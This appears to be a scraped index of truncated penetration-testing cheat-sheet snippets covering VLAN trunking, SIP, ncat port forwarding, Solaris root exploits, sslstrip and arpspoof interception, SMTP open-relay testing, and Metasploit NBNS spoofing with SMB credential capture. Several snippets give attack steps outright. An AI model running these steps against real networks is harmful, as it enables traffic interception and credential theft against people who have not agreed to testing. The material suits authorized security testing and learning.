Configure an Ethernet interface as a VLAN trunk
---------------------------------------------------
Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3.
[+] First install the vlan packag...
VOIP (SIP) Cheatsheet
--------------------------------
SIP usually uses port 5060 (TCP or UDP) for unencrypted signaling, or port 5061 for encrypted transport using TLS.
SIP is an ASCII-based protocol that shares some elements with HTTP, including its Request/Response model. Much like an HTTP request from a browser a SIP clie...
Useful commands
---------------
[+] Remove text using sed
cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g'
[+] Port forwarding using NCAT
ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443"
[+] Windows 7 or later, build port relay
C:\> netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0...
Browser Addons
--------------
- Chrome:
Recx Security Analyser
Wappalyzer
- Firefox/Iceweasel:
Web Developer
Tamper Data
FoxyProxy Standard
User Agent Switcher
PassiveRecon
Wappalyzer
Firebug
HackBar...
[+] Solaris vulnerabilities:
Solaris 7:
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon buffer overflow - allows root
heap_noir ...
1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward
2) Set up iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
3) sslstrip.py -l 8080 -f lock.ico
4) Run arpspoof to redirect traffic to your machine (as...
[+] SMTP Open Relay Commands
[-] ncat -C 86.54.23.178 25
[-] HELO mail.co.uk
[-] MAIL FROM: <user@mail.co.uk>
[-] RCPT TO: <test@email.com>
[-] DATA
Test Email...
[+] Weak SSH Ciphers
sudo nano /etc/ssh/sshd_config
Add the following lines:
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160
Restart SSH
[+] Unquoted Service Paths
Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add &...
[+] NBNS Spoof / Capture
[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run
[>] SMB Capture
msf > use auxiliary/server/...
1. NBTSCAN
root@bt:~# nbtscan -r 10.0.2.0/24
Doing NBT name scan for addresses from 10.0.2.0/24
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
10.0.2.0 Sendto failed: Permission denied
10.0.2.10 <unknown> ...